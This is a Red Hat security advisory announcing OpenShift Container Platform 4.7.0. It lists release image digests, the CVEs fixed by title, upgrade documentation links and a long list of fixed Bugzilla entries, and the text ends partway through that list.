CVE-2020-27813 CVE-2020-27846 CVE-2020-28362 CVE-2020-29652 CVE-2021-2007 CVE-2021-3121 ===================================================================== 1. Summary: Red Hat OpenShift Container Platform release 4.7.0 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.0. See the following advisory for the RPM packages for this release: https://access.redhat.com/errata/RHSA-2020:5634 Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html You may download the oc tool and use it to inspect release image metadata as follows: (For x86_64 architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64 The image digest is sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70 (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-s390x The image digest is sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le The image digest is sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6 All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor. Security Fix(es): * crewjam/saml: authentication bypass in saml authentication (CVE-2020-27846) * golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652) * gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121) * nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774) * kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider (CVE-2020-8563) * containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters (CVE-2020-10749) * heketi: gluster-block volume password details available in logs (CVE-2020-10763) * golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040) * jwt-go: access restriction bypass vulnerability (CVE-2020-26160) * golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813) * golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: For OpenShift Container Platform 4.7, see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html. 4. Bugs fixed (https://bugzilla.redhat.com/): 1620608 - Restoring deployment config with history leads to weird state 1752220 - [OVN] Network Policy fails to work when project label gets overwritten 1756096 - Local storage operator should implement must-gather spec 1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs 1768255 - installer reports 100% complete but failing components 1770017 - Init containers restart when the exited container is removed from node. 1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating 1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset 1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale 1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands 1784298 - "Displaying with reduced resolution due to large dataset." would show under some conditions 1785399 - Under condition of heavy pod creation, creation fails with 'error reserving pod name ...: name is reserved" 1797766 - Resource Requirements" specDescriptor fields - CPU and Memory injects empty string YAML editor 1801089 - [OVN] Installation failed and monitoring pod not created due to some network error. 1805025 - [OSP] Machine status doesn't become "Failed" when creating a machine with invalid image 1805639 - Machine status should be "Failed" when creating a machine with invalid machine configuration 1806000 - CRI-O failing with: error reserving ctr name 1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be 1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be 1810438 - Installation logs are not gathered from OCP nodes 1812085 - kubernetes-networking-namespace-pods dashboard doesn't exist 1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation 1813012 - EtcdDiscoveryDomain no longer needed 1813949 - openshift-install doesn't use env variables for OS_* for some of API endpoints 1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use 1819053 - loading OpenAPI spec for "v1beta1.metrics.k8s.io" failed with: OpenAPI spec does not exist 1819457 - Package Server is in 'Cannot update' status despite properly working 1820141 - [RFE] deploy qemu-quest-agent on the nodes 1822744 - OCS Installation CI test flaking 1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario 1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool 1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file 1829723 - User workload monitoring alerts fire out of the box 1832968 - oc adm catalog mirror does not mirror the index image itself 1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN 1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters 1834995 - olmFull suite always fails once th suite is run on the same cluster 1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz 1837953 - Replacing masters doesn't work for ovn-kubernetes 4.4 1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks 1838751 - [oVirt][Tracker] Re-enable skipped network tests 1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups 1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed 1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP 1841119 - Get rid of config patches and pass flags directly to kcm 1841175 - When an Install Plan gets deleted, OLM does not create a new one 1841381 - Issue with memoryMB validation 1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option 1844727 - Etcd container leaves grep and lsof zombie processes 1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs 1847074 - Filter bar layout issues at some screen widths on search page 1848358 - CRDs with preserveUnknownFields:true don't reflect in status that they are non-structural 1849543 - [4.5]kubeletconfig's description will show multiple lines for finalizers when upgrade from 4.4.8->4.5 1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service 1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard 1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing 1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD 1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service 1853115 - the restriction of --cloud option should be shown in help text. 1853116 - `--to` option does not work with `--credentials-requests` flag. 1853352 - [v2v][UI] Storage Class fields Should Not be empty in VM disks view 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1854567 - "Installed Operators" list showing "duplicated" entries during installation 1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present 1855351 - Inconsistent Installer reactions to Ctrl-C during user input process 1855408 - OVN cluster unstable after running minimal scale test 1856351 - Build page should show metrics for when the build ran, not the last 30 minutes 1856354 - New APIServices missing from OpenAPI definitions 1857446 - ARO/Azure: excessive pod memory allocation causes node lockup 1857877 - Operator upgrades can delete existing CSV before completion 1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed 1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created 1860136 - default ingress does not propagate annotations to route object on update 1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as "Failed" 1860518 - unable to stop a crio pod 1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller 1862430 - LSO: PV creation lock should not be acquired in a loop 1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group. 1862608 - Virtual media does not work on hosts using BIOS, only UEFI 1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network 1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff 1865839 - rpm-ostree fails with "System transaction in progress" when moving to kernel-rt 1866043 - Configurable table column headers can be illegible 1866087 - Examining agones helm chart resources results in "Oh no!" 1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info 1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement 1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity 1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there’s no indication on which labels offer tooltip/help 1866340 - [RHOCS Usability Study][Dashboard] It was not clear why “No persistent storage alerts” was prominently displayed 1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations 1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le & s390x 1866482 - Few errors are seen when oc adm must-gather is run 1866605 - No metadata.generation set for build and buildconfig objects 1866873 - MCDDrainError "Drain failed on , updates may be blocked" missing rendered node name 1866901 - Deployment strategy for BMO allows multiple pods to run at the same time 1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure. 1867165 - Cannot assign static address to baremetal install bootstrap vm 1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig 1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS 1867477 - HPA monitoring cpu utilization fails for deployments which have init containers 1867518 - [oc] oc should not print so many goroutines when ANY command fails 1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster 1867965 - OpenShift Console Deployment Edit overwrites deployment yaml 1868004 - opm index add appears to produce image with wrong registry server binary 1868065 - oc -o jsonpath prints possible warning / bug "Unable to decode server response into a Table" 1868104 - Baremetal actuator should not delete Machine objects 1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead 1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters 1868527 - OpenShift Storage using VMWare vSAN receives error "Failed to add disk 'scsi0:2'" when mounted pod is created on separate node 1868645 - After a disaster recovery pods a stuck in "NodeAffinity" state and not running 1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation 1868765 - [vsphere][ci] could not reserve an IP address: no available addresses 1868770 - catalogSource named "redhat-operators" deleted in a disconnected cluster 1868976 - Prometheus error opening query log file on EBS backed PVC 1869293 - The configmap name looks confusing in aide-ds pod logs 1869606 - crio's failing to delete a network namespace 1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes 1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] 1870373 - Ingress Operator reports available when DNS fails to provision 1870467 - D/DC Part of Helm / Operator Backed should not have HPA 1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json 1870800 - [4.6] Managed Column not appearing on Pods Details page 1871170 - e2e tests are needed to validate the functionality of the etcdctl container 1872001 - EtcdDiscoveryDomain no longer needed 1872095 - content are expanded to the whole line when only one column in table on Resource Details page 1872124 - Could not choose device type as "disk" or "part" when create localvolumeset from web console 1872128 - Can't run container with hostPort on ipv6 cluster 1872166 - 'Silences' link redirects to unexpected 'Alerts' view after creating a silence in the Developer perspective 1872251 - [aws-ebs-csi-driver] Verify job in CI doesn't check for vendor dir sanity 1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them 1872821 - [DOC] Typo in Ansible Operator Tutorial 1872907 - Fail to create CR from generated Helm Base Operator 1872923 - Click "Cancel" button on the "initialization-resource" creation form page should send users to the "Operator details" page instead of "Install Operator" page (previous page) 1873007 - [downstream] failed to read config when running the operator-sdk in the home path 1873030 - Subscriptions without any candidate operators should cause resolution to fail 1873043 - Bump to latest available 1.19.x k8s 1873114 - Nodes goes into NotReady state (VMware) 1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem 1873305 - Failed to power on /inspect node when using Redfish protocol 1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information 1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: “?” button/icon in Developer Console ->Navigation 1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working 1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name > 63 characters 1874057 - Pod stuck in CreateContainerError - error msg="container_linux.go:348: starting container process caused \"chdir to cwd (\\\"/mount-point\\\") set in config.json failed: permission denied\"" 1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver 1874192 - [RFE] "Create Backing Store" page doesn't allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider 1874240 - [vsphere] unable to deprovision - Runtime error list attached objects 1874248 - Include validation for vcenter host in the install-config 1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6 1874583 - apiserver tries and fails to log an event when shutting down 1874584 - add retry for etcd errors in kube-apiserver 1874638 - Missing logging for nbctl daemon 1874736 - [downstream] no version info for the helm-operator 1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution 1874968 - Accessibility: The project selection drop down is a keyboard trap 1875247 - Dependency resolution error "found more than one head for channel" is unhelpful for users 1875516 - disabled scheduling is easy to miss in node page of OCP console 1875598 - machine status is Running for a master node which has been terminated from the console 1875806 - When creating a service of type "LoadBalancer" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes. 1876166 - need to be able to disable kube-apiserver connectivity checks 1876469 - Invalid doc link on yaml template schema description 1876701 - podCount specDescriptor change doesn't take effect on operand details page 1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt 1876935 - AWS volume snapshot is not deleted after the cluster is destroyed 1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted 1877105 - add redfish to enabled_bios_interfaces 1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted` 1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown 1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only 'rootDevices' 1877681 - Manually created PV can not be used 1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53 1877740 - RHCOS unable to get ip address during first boot 1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5 1877919 - panic in multus-admission-controller 1877924 - Cannot set BIOS config using Redfish with Dell iDracs 1878022 - Met imagestreamimport error when import the whole image repository 1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default "Filesystem Name" instead of providing a textbox, & the name should be validated 1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status 1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM 1878766 - CPU consumption on nodes is higher than the CPU count of the node. 1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus. 1878823 - "oc adm release mirror" generating incomplete imageContentSources when using "--to" and "--to-release-image" 1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode 1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used 1878953 - RBAC error shows when normal user access pvc upload page 1878956 - `oc api-resources` does not include API version 1878972 - oc adm release mirror removes the architecture information 1879013 - [RFE]Improve CD-ROM interface selection 1879056 - UI should allow to change or unset the evictionStrategy 1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled 1879094 - RHCOS dhcp kernel parameters not working as expected 1879099 - Extra reboot during 4.5 -> 4.6 upgrade 1879244 - Error adding container to network "ipvlan-host-local": "master" field is required 1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder 1879282 - Update OLM references to point to the OLM's new doc site 1879283 - panic after nil pointer dereference in pkg/daemon/update.go 1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests 1879419 - [RFE]Improve boot source description for 'Container' and ‘URL’ 1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted. 1879565 - IPv6 installation fails on node-valid-hostname 1879777 - Overlapping, divergent openshift-machine-api namespace manifests 1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with 'Basic', skipping basic authentication in Log message in thanos-querier pod the oauth-proxy 1879930 - Annotations shouldn't be removed during object reconciliation 1879976 - No other channel visible from console 1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc. 1880148 - dns daemonset rolls out slowly in large clusters 1880161 - Actuator Update calls should have fixed retry time 1880259 - additional network + OVN network installation failed 1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as "Failed" 1880410 - Convert Pipeline Visualization node to SVG 1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn 1880443 - broken machine pool management on OpenStack 1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s. 1880473 - IBM Cloudpak operators installation stuck "UpgradePending" with InstallPlan status updates failing due to size limitation 1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables) 1880785 - CredentialsRequest missing description in `oc explain` 1880787 - No description for Provisioning CRD for `oc explain` 1880902 - need dnsPlocy set in crd ingresscontrollers 1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster 1881027 - Cluster installation fails at with error : the container name \"assisted-installer\" is already in use 1881046 - [OSP] openstack-cinder-csi-driver-operator doesn't contain required manifests and assets 1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node 1881268 - Image uploading failed but wizard claim the source is available 1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration 1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup 1881881 - unable to specify target port manually resulting in application not reachable 1881898 - misalignment of sub-title in quick start headers 1882022 - [vsphere][ipi] directory path is incomplete, terraform can't find the cluster 1882057 - Not able to select access modes for snapshot and clone 1882140 - No description for spec.kubeletConfig 1882176 - Master recovery instructions don't handle IP change well 1882191 - Installation fails against external resources which lack DNS Subject Alternative Name 1882209 - [ BateMetal IPI ] local coredns resolution not working 1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from "Too large resource version" 1882268 - [e2e][automation]Add Integration Test for Snapshots 1882361 - Retrieve and expose the latest report for the cluster 1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use 1882556 - git:// protocol in origin tests is not currently proxied 1882569 - CNO: Replacing masters doesn't work for ovn-kubernetes 4.4 1882608 - Spot instance not getting created on AzureGovCloud 1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance 1882649 - IPI installer labels all images it uploads into glance as qcow2 1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic 1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page 1882660 - Operators in a namespace should be installed together when approve one 1882667 - [ovn] br-ex Link not found when scale up RHEL worker 1882723 - [vsphere]Suggested mimimum value for providerspec not working 1882730 - z systems not reporting correct core count in recording rule 1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully 1882781 - nameserver= option to dracut creates extra NM connection profile 1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined 1882844 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1883388 - Bare Metal Hosts Details page doesn't show Mainitenance and Power On/Off status 1883422 - operator-sdk cleanup fail after installing operator with "run bundle" without installmode and og with ownnamespace 1883425 - Gather top installplans and their count 1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2 1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel] 1883538 - must gather report "cannot file manila/aws ebs/ovirt csi related namespaces and objects" error 1883560 - operator-registry image needs clean up in /tmp 1883563 - Creating duplicate namespace from create namespace modal breaks the UI 1883614 - [OCP 4.6] [UI] UI should not describe power cycle as "graceful" 1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate 1883660 - e2e-metal-ipi CI job consistently failing on 4.4 1883765 - [user workload monitoring] improve latency of Thanos sidecar when streaming read requests 1883766 - [e2e][automation] Adjust tests for UI changes 1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations 1883773 - opm alpha bundle build fails on win10 home 1883790 - revert "force cert rotation every couple days for development" in 4.7 1883803 - node pull secret feature is not working as expected 1883836 - Jenkins imagestream ubi8 and nodejs12 update 1883847 - The UI does not show checkbox for enable encryption at rest for OCS 1883853 - go list -m all does not work 1883905 - race condition in opm index add --overwrite-latest 1883946 - Understand why trident CSI pods are getting deleted by OCP 1884035 - Pods are illegally transitioning back to pending 1884041 - e2e should provide error info when minimum number of pods aren't ready in kube-system namespace 1884131 - oauth-proxy repository should run tests 1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied 1884221 - IO becomes unhealthy due to a file change 1884258 - Node network alerts should work on ratio rather than absolute values 1884270 - Git clone does not support SCP-style ssh locations 1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout 1884435 - vsphere - loopback is randomly not being added to resolver 1884565 - oauth-proxy crashes on invalid usage 1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy 1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users 1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment 1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu. 1884632 - Adding BYOK disk encryption through DES 1884654 - Utilization of a VMI is not populated 1884655 - KeyError on self._existing_vifs[port_id] 1884664 - Operator install page shows "installing..." instead of going to install status page 1884672 - Failed to inspect hardware. Reason: unable to start inspection: 'idrac' 1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure 1884724 - Quick Start: Serverless quickstart doesn't match Operator install steps 1884739 - Node process segfaulted 1884824 - Update baremetal-operator libraries to k8s 1.19 1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping 1885138 - Wrong detection of pending state in VM details 1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2 1885165 - NoRunningOvnMaster alert falsely triggered 1885170 - Nil pointer when verifying images 1885173 - [e2e][automation] Add test for next run configuration feature 1885179 - oc image append fails on push (uploading a new layer) 1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig 1885218 - [e2e][automation] Add virtctl to gating script 1885223 - Sync with upstream (fix panicking cluster-capacity binary) 1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2 1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2 1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2 1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2 1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2 1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2 1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI 1885315 - unit tests fail on slow disks 1885319 - Remove redundant use of group and kind of DataVolumeTemplate 1885343 - Console doesn't load in iOS Safari when using self-signed certificates 1885344 - 4.7 upgrade - dummy bug for 1880591 1885358 - add p&f configuration to protect openshift traffic 1885365 - MCO does not respect the install section of systemd files when enabling 1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating 1885398 - CSV with only Webhook conversion can't be installed 1885403 - Some OLM events hide the underlying errors 1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case 1885425 - opm index add cannot batch add multiple bundles that use skips 1885543 - node tuning operator builds and installs an unsigned RPM 1885644 - Panic output due to timeouts in openshift-apiserver 1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU < 30 || totalMemory < 72 GiB for initial deployment 1885702 - Cypress: Fix 'aria-hidden-focus' accesibility violations 1885706 - Cypress: Fix 'link-name' accesibility violation 1885761 - DNS fails to resolve in some pods 1885856 - Missing registry v1 protocol usage metric on telemetry 1885864 - Stalld service crashed under the worker node 1885930 - [release 4.7] Collect ServiceAccount statistics 1885940 - kuryr/demo image ping not working 1886007 - upgrade test with service type load balancer will never work 1886022 - Move range allocations to CRD's 1886028 - [BM][IPI] Failed to delete node after scale down 1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas 1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd 1886154 - System roles are not present while trying to create new role binding through web console 1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5->4.6 causes broadcast storm 1886168 - Remove Terminal Option for Windows Nodes 1886200 - greenwave / CVP is failing on bundle validations, cannot stage push 1886229 - Multipath support for RHCOS sysroot 1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage 1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status 1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL 1886397 - Move object-enum to console-shared 1886423 - New Affinities don't contain ID until saving 1886435 - Azure UPI uses deprecated command 'group deployment' 1886449 - p&f: add configuration to protect oauth server traffic 1886452 - layout options doesn't gets selected style on click i.e grey background 1886462 - IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected 1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest 1886524 - Change default terminal command for Windows Pods 1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution 1886600 - panic: assignment to entry in nil map 1886620 - Application behind service load balancer with PDB is not disrupted 1886627 - Kube-apiserver pods restarting/reinitializing periodically 1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider 1886636 - Panic in machine-config-operator 1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer. 1886751 - Gather MachineConfigPools 1886766 - PVC dropdown has 'Persistent Volume' Label 1886834 - ovn-cert is mandatory in both master and node daemonsets 1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState 1886861 - ordered-values.yaml not honored if values.schema.json provided 1886871 - Neutron ports created for hostNetworking pods 1886890 - Overwrite jenkins-agent-base imagestream 1886900 - Cluster-version operator fills logs with "Manifest: ..." spew 1886922 - [sig-network] pods should successfully create sandboxes by getting pod 1886973 - Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console 1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO 1887010 - Imagepruner met error "Job has reached the specified backoff limit" which causes image registry degraded 1887026 - FC volume attach fails with “no fc disk found” error on OCP 4.6 PowerVM cluster 1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6 1887046 - Event for LSO need update to avoid confusion 1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image 1887375 - User should be able to specify volumeMode when creating pvc from web-console 1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console 1887392 - openshift-apiserver: delegated authn/z should have ttl > metrics/healthz/readyz/openapi interval 1887428 - oauth-apiserver service should be monitored by prometheus 1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting "degraded: False" 1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data 1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes 1887465 - Deleted project is still referenced 1887472 - unable to edit application group for KSVC via gestures (shift+Drag) 1887488 - OCP 4.6: Topology Manager OpenShift E2E test fails: gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface 1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster 1887525 - Failures to set master HardwareDetails cannot easily be debugged 1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable 1887585 - ovn-masters stuck in crashloop after scale test 1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade. 1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator 1887740 - cannot install descheduler operator after uninstalling it 1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events 1887750 - `oc explain localvolumediscovery` returns empty description 1887751 - `oc explain localvolumediscoveryresult` returns empty description 1887778 - Add ContainerRuntimeConfig gatherer 1887783 - PVC upload cannot continue after approve the certificate 1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard 1887799 - User workload monitoring prometheus-config-reloader OOM 1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky 1887863 - Installer panics on invalid flavor 1887864 - Clean up dependencies to avoid invalid scan flagging 1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison 1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig 1888015 - workaround kubelet graceful termination of static pods bug 1888028 - prevent extra cycle in aggregated apiservers 1888036 - Operator details shows old CRD versions 1888041 - non-terminating pods are going from running to pending 1888072 - Setting Supermicro node to PXE boot via Redfish doesn't take affect 1888073 - Operator controller continuously busy looping 1888118 - Memory requests not specified for image registry operator 1888150 - Install Operand Form on OperatorHub is displaying unformatted text 1888172 - PR 